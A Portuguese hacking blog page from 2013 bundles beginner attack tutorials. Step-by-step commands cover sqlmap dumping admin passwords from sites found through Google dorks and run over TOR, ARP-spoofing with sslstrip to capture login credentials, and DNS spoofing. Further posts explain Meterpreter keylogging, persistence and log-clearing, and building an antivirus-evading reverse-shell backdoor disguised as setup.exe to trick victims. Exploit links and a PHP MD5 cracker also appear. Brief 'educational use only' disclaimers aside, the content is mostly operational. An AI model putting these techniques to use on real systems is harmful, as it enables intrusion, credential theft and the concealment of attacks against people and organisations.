terça-feira, 30 de julho de 2013

SQLMAP SQL Injection para quem está iniciando

Lembre-se que o uso incorreto dessa técnica é crime, e o meu objetivo de mostrar essas informações aqui é apenas para aprendizado e testes em ambientes controlados e ou clientes.
Abra um terminal no backtrack e vamos usar a ferramenta SQLMAP
OBS: 24/4/2013 é perfeitamente possível e recomendável usar o Kali Linux para seguir esse tutorial, para isso basta executar o comando sqlmap + (parametros) direto no terminal sem entrar em nenhum diretório específico. E se vc seguiu nossa dica de instalação do Kali Linux e configurou o TOR vc pode usar ao final de cada comando digitado o parametro –tor (dois traços) e fazer as auditorias de forma anônima segue o link da dica:
cd /pentest/database/sqlmap
Vamos executar o sqlmap
./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 –-dbs
Você precisa ter um alvo vulnerável para conseguir, para saber se o alvo é vulnerável, basta por uma ‘ no final da url e dar “enter” se retornar algum erro de banco de dados o alvo é vulnerável. Pode ser usar o google para isso fazendo por exemplo a seguinte buscainrul:noticias.php?id=1 Existem várias outras possibilidades que podem ser usadas para busca.
O campo “current database” vai mostrar o nome do BD vulnerável, daí basta usarmos as opções para explorarmos. Podemos listar todas as tabelas.
./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD –-tables
Devemos trocar NOMEDOBD pelo valor obtido em “current database”
O Resultado vai ser algo parecido com isso:
Screenshot-4
Daí podemos escolher uma tabela e listar as colunas
./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD
 -T admin –-columns
O resultado será parecido a esse:
Screenshot-6
Podemos escolher quais colunas queremos extrair informações
./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD
 -T admin -C id,passwrd,u_name –-dump
Entendendo as técnicas é possível extrair todos os dados que desejar do Banco vulnerável

Explorando vulnerabilidade em roteador tp-link

vulnerabilidade encontrada nos roteadores TP-Link WR740N, WR740ND and WR2543ND
Essa vulnerabilidade permite a captura do conteúdo do arquivo shadow que contém as senhas de acesso ao roteador.
Para conseguir essa informação você pode usar o burp-suite disponível no backtrack, para isso abra a ferramenta, vá em repeater, digite o ip do alvo e clique em go. após isso vc pode editar a requisição conforme abaixo e clicar em go novamente o resultado será semelhante ao abaixo.
ScreenHunter_06 Mar. 11 18.40
Agora com um pouco mais de trabalho vc consegue consegue quebrar essa senha

Usando o nmap para verificação de vulnerabilidades

como usar o nmap para checar a existência da vulnerabilidade MS08-067, para quem não conhece essa vulnerabilidade pode ser explorada pelo Worm Conficker. Algumas ferramentas como Metasploit também podem ser usadas para explorar essa vulnerabilidade, basta usar o seguinte comando:
nmap --script smb-check-vulns.nse -p445 <host> (No de um host alvo apenas)



"nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args
safe=1 [target networks] (No caso de escanear todo um segmento de rede)"

A resposta será algo parecido com isso informando se o alvo é vulnerável ou não

Host script results:
| smb-check-vulns:  
|   MS08-067: NOT VULNERABLE
|   Conficker: Likely CLEAN
|   regsvc DoS: regsvc DoS: NOT VULNERABLE
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
Caso vc encontre uma máquina vulnerável vc pode explorer essa falha usando essa dica aqui

Usando sslstrip para capturar credenciais (MITM – Ethical Hacking)

Para realizar este ataque usei como “homem do meio” uma máquina com Kali Linux, uma distribuição Linux específica para pentest.
Caso precise de ajuda para instalação e configuração dessa ferramenta pode ver aqui
Para o meu teste tenho o seguinte cenário, para que você possa fazer o teste basta adaptar ao seu cenário.
IP da Vítima: 192.168.2.12
IP do default gateway 192.168.2.2
Vamos lá!
Usando o Kali Linux abra 4 terminais e deixe eles logados como “root” usando o comando “sudo su”. OBS: Creio que isso facilita para quem talvez não tenha muita experiência com linux, caso tenha experiência use os terminais como achar melhor.
Em um dos terminais digite o seguinte comando:
echo 1 > /proc/sys/net/ipv4/ip_forward (habilita o redirecionamento de pacotes)
No segundo terminal digite o seguinte o seguinte
iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 1000 (redireciona os pacotes da porta 80 para porta 1000 da máquina do atacante)
No terceiro terminal digite
arpspoof -i eth0 -t 192.168.2.12 192.168.2.2 (Lembre-se de adaptar de acordo com seu ambiente, esse comando vai “envenenar” a tabela arp da vítima fazendo com que ele mande todo trafego que ia para o gateway para o atacante)
No quarto terminal digite o seguinte:
sslstrip -l 1000 (vai ler todos os dados na porta 1000)
De volta no primeiro terminal digite o seguinte:
ettercap -Tq -i eth0 (Aqui é onde vamos ver o que queremos)
Após esse passo a “vítima” deve acessar algum site que seja necessário autenticação, gmail, hotmail, facebook, twitter, etc…
Se tudo foi feito corretamente você vai ter uma tela semelhante a essa.
ScreenHunter_21 Apr. 22 18.56
Conforme pode se ver na imagem acima, marcado em vermelho, após a vítima fazer uma autenticação, será exibido o login e senha da pessoa.
Lembre-se que isso deve ser feito apenas em ambientes controlados ou com as devidas autorizações.

Usando Kali linux para fazer um ataque de DNS Spoofing com Ettercap

Esse tipo de ataque é muito importante para conseguirmos algumas credenciais durante a execução de um PenTest. Ele consiste em enviar respostas falsas a requisições de DNS que forem feitas.
Para executarmos esse ataque a primeira coisa que queremos é editar o arquivo etter.dns, basicamente ele é como o arquivo hosts do windows e linux, nele podemos configurar para onde as solicitações serão enviadas.
Vamos lá, abra um terminal e digite
# vi /usr/share/ettercap/etter.dns

ScreenHunter_23 Apr. 25 15.32
Podemos editar seguindo o padrão que pode ser visto na imagem acima, salve e saia e após digite ettercap -G que vai abrir o Ettercap em modo gráfico.
Vá em Sniff –> Unified Sniffing e quando solicitado escolha sua placa de rede eth0.
ScreenHunter_23 Apr. 25 15.38
Agora vá em “Hosts” e clique em “Scan for hosts”
Vá novamente em “Hosts” Clique em Host List para visualizar uma lista de todos IP’s disponíveis na rede, selecione qual será a vítima que vai receber as respostas falsas e clique em Add to Target 1
ScreenHunter_23 Apr. 25 15.41
Agora clique em Start –> Start Sniffing.
Após isso vá em MitM –> Arp Poisoning.
Selecione a opção Sniff remote connections conforme abaixo e clique em OK
ScreenHunter_23 Apr. 25 15.45
Agora vá em Plugins –> Manage the Plugins e de um duplo clique em dns_spoof
ScreenHunter_23 Apr. 25 15.47
Feito isso o cliente selecionado vai começar a receber respostas falsas de DNS.
Esse ataque é extremamente eficaz quando usado em conjunto com essa nossa dica aqui abaixo para conseguir credenciais

segunda-feira, 29 de julho de 2013

Tutorial Kali Linux - Comandos Meterpreter

Olá mais uma vez,
Esse tutorial tem como objetivo mostrar como usar o Metasploit Framework para explorar uma máquina alvo, nesse tutorial partimos do princípio que vc já abriu uma sessão no meterpreter, caso ainda não tenha conseguido pode tentar algumas de nossas dicas como essa aqui: 
Após abrir a sessão a melhor sugestão é migrarmos para um processo mais estável e que torne mais difícil vc ser detectado para isso precisamos listar todos os processos disponíveis usando o comando ps
Será exibido uma tela semelhante a essa



Aqui podemos visualizar todos os processos em execução, uma sugestão é migrarmos para o processo explorer.exe para isso precisamos localizar esse processo na lista e ver qual o valor do PID daí migramos para ele usando o comando migrate 1708 (troque o número 1708 pelo número do seu PID)

Seguem-se agora algumas opções:

sysinfo - esse comando vai mostrar qual a versão do windows da máquina alvo.
 
getsystem – Eleva o nível de privilégio para SYSTEM

ipconfig – Mostra o endereço ip da máquina alvo

screenshot – Salva um arquivo JPEG com um print da tela do computador alvo

keyscan_start – Inicia o keylogger ou seja captura tudo que for digitado no teclado do computador alvo
keyscan_dump - Visualiza os dados capturados após o keyscan_start.

keyscan_stop – Para a captura

run persistence -X - Esse comando configura a máquina alvo para que a cada boot no sistema ela estabeleça novamente a conexão com a máquina atacante.

hashdump – faz a captura do hash de senhas do computador alvo.

execute – Executa um aplicativo ex. execute -f calc.exe

shell – Abre um prompt de comando

clearev - Limpa os logs de eventos do Windows, ou seja, apaga possíveis rastros deixados por vc.

Bom essas são apenas algumas dicas  pra vocês irem brincando um pouco. :)
Usando o comando help vc também pode descobrir várias outras opções.

Espero que tenham gostado e até a próxima.


Tutorial Kali Linux - Criando um backdoor para controlar PC’s remotamente

Criando um backdoor para controlar PC’s remotamente

Hoje mostrarei como usar o SET (social engineering toolkit) disponível no Kali Linux para criarmos um backdoor que pode ser utilizado para controlar remotamente computadores Windows. Vamos criar um executável legítimo dificilmente detectado por algum antivírus, assim temos completo a um computador alvo.

obs: todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime.

Vamos lá !

Em primeiro lugar vamos acessar o menu Applications/Kali Linux/Exploitation Tools/Social Engineering Toolkit e clique em se-toolkit. Vai ser exibido um menu como esse abaixo visto na imagem. 

Neste menu de opções selecione a opção 1


 Nesse segundo menu selecione a opção 4




Nessa tela abaixo você deve informar corretamente o seu endereço ip, caso tenha dúvidas abra um novo terminal e digite ifconfig eth0 daí preencha corretamente esse campo.




Na tela abaixo, você deve escolher a segunda opção para criarmos uma conexão reversa, ou seja, a nosso computador alvo é quem fará a conexão ao atacante.





Na tela abaixo atente aos 3 passos que devemos tomar, primeiro no tipo de backdoor, digite o 16, na sequência devemos definir qual a portal local, na máquina do atacante, que ficará “escutando” as tentativas de conexão feitas pelo alvo, o padrão é a 443 daí é só digitar Enter, caso queira mudar a porta se ela já estiver sendo usada podemos digitar outro número e então dar enter, na sequência você é questionado se quer iniciar a escuta daí vc deve digitar :yes





Feito isso o backdoor será criado e nosso computador alvo começará a escutar as tentativas de conexão das máquinas alvo.
O executável criado fica na pasta /usr/share/set e se chama msf.exe
Devemos tornar ele um executável daí podemos abrir um novo terminal e digitar o seguinte comando

chmod +x /usr/share/set/msf.exe

Caso queira vc pode renomear esse arquivo para facilitar o processo de engenharia social, para convencer alguém a, por exemplo, instalar um programa novo. Ex: setup.exe

Agora precisa copiar esse executável para a máquina alvo e assim que ele for executado vai aparecer uma tela como essa abaixo.



Aqui ao digitar o comando sessions podemos listar os alvos já conectados.

Ao digitarmos sessions -i 1 (supondo que 1 seja o número da ID exibida através do comando sessions, caso outro número seja exibido basta trocar o 1 pelo número mostrado) vamos poder interagir com a máquina alvo tendo acesso completo a ela. Em breve publicarei algumas dicas de comandos que podem ser usados para explorar uma máquina alvo.

Espero que tenham gostado da dica e não esqueça de compartilhar. vlw!




sábado, 2 de março de 2013

MS10-065 da Microsoft IIS 5 NTFS de desvio de autenticação córrego



MS10-065 

MS10-065 da Microsoft IIS 5 Fluxo NTFS módulo de desvio de autenticação ignora a autenticação básica para o Internet Information Services (IIS). Anexando o nome do fluxo NTFS para o nome do diretório de um pedido, é possível ignorar a autenticação.

Link: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/auxiliary/admin/http/iis_auth_bypass.rb

quarta-feira, 6 de fevereiro de 2013

squitch p.u.r.e

 

Squitch p.u.r.e. é uma distribuição pentesting puro. Ele contém vários tipos de ferramentas de teste de penetração, como como WEP, WPA, senha, etc

Base: Ubuntu Server
Kernel: 3.2.6
Desktop: Gnome 2
Ferramentas:

Angry IP Scanner
Etherape
nmap
wireshark

fasttrack
metasploit 4.2.5
inguma

w3af
wapiti

crise
hidra-gtk

rede de rádio-ferramentas hack'n'slay


Link: http://sourceforge.net/projects/squitchpure/

OpenVAS

OpenVAS é um scanner de vulnerabilidade que foi bifurcada da última versão livre do Nessus após Nessus foi patenteado em 2005. Ela continua a crescer, com mais de 23 mil testes a partir de novembro de 2011. OpenVAS plugins são escritas na mesma linguagem usada pelo NASL Nessus. Para downloads e mais informações, visite a página do OpenVAS.

Link: http://www.openvas.org/download.html

Zed Attack Proxy 2.0.0

 
O Proxy Ataque Zed (ZAP) é uma ferramenta fácil de usar testes integrados de penetração para encontrar vulnerabilidades em aplicações web. Ele é projetado para ser usado por pessoas com uma ampla gama de experiência em segurança e, como tal, é ideal para desenvolvedores e testadores funcionais que são novos para testes de penetração. ZAP fornece scanners automáticos, bem como um conjunto de ferramentas que permitem a você para encontrar vulnerabilidades de segurança manualmente.

Link para windows: http://packetstormsecurity.com/files/download/119965/ZAP_2.0.0_Windows.exe
Link para o Linux:  http://packetstormsecurity.com/files/download/119963/ZAP_2.0.0_Linux.tar.gz

Mole

Mole é um automático ferramenta SQL Injection exploração. Apenas fornecendo uma URL vulnerável e uma seqüência válida no site ele pode detectar a injeção e explorá-lo, usando a técnica de união ou uma técnica baseada em consulta booleana. O Mole usa uma interface de comando baseada, permitindo ao usuário para indicar a ação que ele quer executar facilmente. O CLI também fornece auto-realização em ambos os comandos e argumentos de comando, fazendo com que o usuário digite o menos possível.

Link: http://sourceforge.net/projects/themole/files/latest/download?source=directory

Dynipdrop

dynipdrop main config file 

Dynipdrop é um IDS-receptor e escrito em C. Às vezes eu quero cair remotos xx segundos IP, e Undrop quando timeout; xxx Gota Às vezes sniffer servidor encontrar um hack de ação e eu quero dizer a outro servidor / servidor-grupo "IP. xxx.xxx.xxx segundo xX ".

Portanto, este programa - dynipdrop (daemon "dynipdrop" e "ipdrop_local" para enviar uma queda msg-de localhost, e "ipdrop_udp" para enviar uma queda msg para outro servidor (instalado o daemon dynipdrop).

dynipdrop rodar em Linux e iptables necessidade, eu uso "portsentry (http://sourceforge.net/projects/sentrytools/" + "sshdprotect" + "dynipdrop" para proteger meus servidores, e espero que este software faça alguma ajuda para você.


Link: http://sourceforge.net/projects/dynipdrop/files/latest/download?source=directory

Linux IPTables Firewall 1.4.17

iptables é construído em cima de netfilter, o quadro de alteração do pacote para Linux 2.4.x e 2.6.x. É uma grande reformulação do ipchains seu antecessor, e é usado para controlar a filtragem de pacotes, Tradução de Endereços de Rede (masquerading, portforwarding, proxy transparente), e os efeitos especiais, tais como a desconfiguração do pacote.

Link: http://packetstormsecurity.com/files/download/119858/iptables-1.4.17.tar.bz2

SQLSentinel

SQLSentinel

SQLSentinel é uma ferramenta opensource que automatiza o processo de encontrar a injeção de SQL em um site. SQLSentinel inclui uma teia de aranha e sql localizador de erros. Você dá entrada em um site e SQLSentinel rastreia e tentar explorar os parâmetros de erro de validação para você. Quando o trabalho for concluído, ele pode gerar um relatório pdf que contém o vuln url encontrado eo url rastreado.

Por favor, lembre-se que SQLSentinel não é uma ferramenta de exploração. Ela só pode encontra vulnerabilidades url


Link:  http://sourceforge.net/projects/sqlsentinel/files/latest/download?source=directory

Hcon Security Testing Framework

HCON Testing Framework Segurança é Open Source quadro Teste de Invasão baseados em tecnologias diferentes do navegador, o que ajuda qualquer profissional de segurança para ajuda no teste de penetração ou de verificação de vulnerabilidade assessments.contains webtools, que são poderosos em fazer XSS (Cross Site Scripting), SQL Injection, siXSS , CSRF, Trace XSS, RFI, LFI, etc Mesmo útil para qualquer um interessado no domínio da segurança da informação - estudantes, profissionais de segurança, desenvolvedores web, avaliações de vulnerabilidade manuais e muito mais.

Link: http://sourceforge.net/projects/hconframework/files/latest/download?source=directory

Katana : Multi-Boot Security Suite

http://www.gutterhelmetbydannet.com/images/Katana_logo.gif 
Pacotes de segurança Katana / distribuições de hackers éticos (como Backtrack, Ophcrack, & UBCD), juntamente com aplicações portáteis do Windows (como Metasploit, NMAP, Cain & Able, e Wireshark) para fugir de um único drive.Features flash USB

     100s de segurança / éticos ferramentas de hacking
     Inicializar a partir de múltiplas distribuições ao vivo
     Executar hundres de aplicação portátil de segurança do Windows a partir de um único drive flash
     Adicionar distribuições adicionais e aplicações portáteis


Link: http://sourceforge.net/projects/katana-usb/files/latest/download?source=directory

WebSploit Framework




WebSploit é um projeto Open Source para: Obras de engenharia social, Web Scan, esteiras e Análise, Exploiter automática, ataques de rede de apoio ..
[+] Autopwn - Usado De Metasploit para verificação e Exploit Serviço de Destino
[+] WMAP - Scan, Crawler alvo usado De Metasploit WMAP Plugin
[+] infector formato - injetar reversa e carga se ligam em formato de arquivo

[+] Scanner phpmyadmin
[+] LFI Bypasser
[+] Apache Scanner Usuários
[+] Dir Bruter
[+] administrador localizador
[+] MLITM Ataque - Homem esquerda no meio, XSS Ataques de phishing
[+] MITM - Man In The Middle Ataque
[+] Ataque Applet Java
[+] Ataque MFOD Vector
[+] USB Infecção Ataque
[+] ARP ataque DoS
[+] Ataque do assassino Web
[+] Ataque Atualização Falso
[+] Ataque Falso ponto de acesso


Link: http://sourceforge.net/projects/websploit/files/latest/download?source=directory

Network Security Toolkit (NST)

2 - NST Geolocated Active Neflow Connections
Network Security Toolkit


Network Security Toolkit (NST) é uma imagem ISO inicializável (DVD ao vivo) baseado no Fedora 16 com fácil acesso a best-of-breed Open Source aplicações de segurança de rede e deve ser executado em mais intenção platforms.The x86/x86_64 principal de desenvolver este conjunto de ferramentas era fornecer o administrador de segurança de rede com um conjunto abrangente de ferramentas Open Source segurança da rede. A maioria dos instrumentos publicados no artigo: Top 125 Ferramentas de segurança por INSECURE.ORG estão disponíveis no kit de ferramentas. Uma interface de usuário avançada Web (WUI) é fornecido para o sistema / administração de rede, navegação, automação de geolocalização, e configuração de rede e muitas aplicações de segurança encontradas na distribuição NST. No mundo virtual, NST pode ser usado como uma garantia de validação de análise de rede, e uma ferramenta de monitoramento em servidores de empresas de hospedagem virtual máquinas virtuais.
 
Link: http://sourceforge.net/projects/nst/files/latest/download?source=directory

Metasploit SIP Penetration Testing Modules :: Tools

SIP biblioteca para Metasploit é desenvolvido para ajudar a SIP Testsing Penetração. Ele oferece recurso de autenticação que ajuda a criar testes simples. Ele inclui cinco módulos diferentes, com suporte de autenticação: testador de opções, Forcer bruta, enumerador, convidam testador e testador de inscrição. Todos os ataques poderiam realizar antes e após a autenticação de fuzz SIP serviços e serviços de valor acrescentado.

Link: packetstormsecurity.com/files/download/120053/sipmodules.zip

FreeSSHd 1.2.6 Authentication Bypass :: Exploit

Este módulo Metasploit explora uma vulnerabilidade encontrada nas versões 1.2.6 e FreeSSHd abaixo para ignorar a autenticação. Você só precisa do nome de usuário (que assume a raiz). A façanha foi testado com tanto a senha e autenticação de chave pública.

Link: http://dl.packetstormsecurity.net/1301-exploits/freesshd_authbypass.rb.txt

Applet Java JMX Execução Remota de Código

Applet Java JMX Execução Remota de Código - Este módulo Metasploit abusos das classes JMX de um Applet Java para executar o código Java arbitrário fora da caixa de areia tão explorados na natureza, em janeiro de 2013. A vulnerabilidade afeta a versão Java 7u10 e anteriores.

Link: http://dl.packetstormsecurity.net/1301-exploits/java_jre17_jmxbean.rb.txt

NVidia Display Driver Buffer Overflow :: Exploit

NVidia exibição de estouro de buffer Driver é um exploit para um buffer overflow no serviço de driver de vídeo NVIDIA. O serviço de escuta em um pipe nomeado (\ pipe \ nsvr), que tem uma DACL NULL configurado, o que deve significar que qualquer usuário conectado ou usuário remoto em um contexto de domínio (Windows compartilhamento de firewall / arquivo permitir) deve ser capaz de explorar esta vulnerabilidade . Isto é atualizado Sean de Regge para direcionar a 30 de agosto de 2012 nvvsvc.exe construção.

Link: http://dl.packetstormsecurity.net/1301-exploits/nvvsvc_expl.cpp-2.txt

Atacar O Windows 7/8 Randomization Espaço de Endereço :: Exploits


Atacando o arquivo do Windows Randomization 7/8 de espaço de endereços tem um whitepaper que discute a pesquisa e os métodos utilizados para contornar Microsoft Windows 7 e 8 proteções de memória para executar código arbitrário montagem. Prova de conceitos também são fornecidos.

Link download: http://packetstormsecurity.com/files/download/119835/rlsa.zip

terça-feira, 5 de fevereiro de 2013

[PHP] Md5 Cracker




01#!/usr/bin/php
02<?php
03  
04if(!isset($argv[2])){
05echo "
06\033[1;34m[*]\033[0m MD5 Crack By MMxM
07\033[1;34m[*]\033[0m Modo de uso: $argv[0] [hash-md5] [wordlist]
08  
09";
10exit;
11}
12if(strlen($argv[1]) != 32){
13echo "\n\033[1;31m[-]\033[0m INVALID MD5 HASH\n\n";
14exit;
15}
16  
17$wl = fopen ("$argv[2]","r");
18if(!$wl){
19die("\n\nFAILED TO OPEN $argv[2]\n\n");
20}
21while (!feof ($wl)) {
22$pass = fgets($wl,4096);
23$a = chop($pass);
24if(md5($a) == $argv[1]){
25echo "\n\033[0;32m[+]\033[0m Cracked!!! [$a]\n";
26echo "\033[0;32m[+]\033[0m [$argv[1]] == [$a]\n\n";
27exit;
28} else{
29echo "\033[1;34m[*]\033[0m ",md5($a),"\t == [$a]\n";
30}
31  
32}
33fclose ($wl);
34  
35echo "\033[1;31m[-]\033[0m No Password crackeds :/\n";
36echo "\033[1;34m[*]\033[0m (100% complete)\n\n";
37?>
Poderá também gostar de:
← Postagens mais recentes Postagens mais antigas → Página inicial
Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86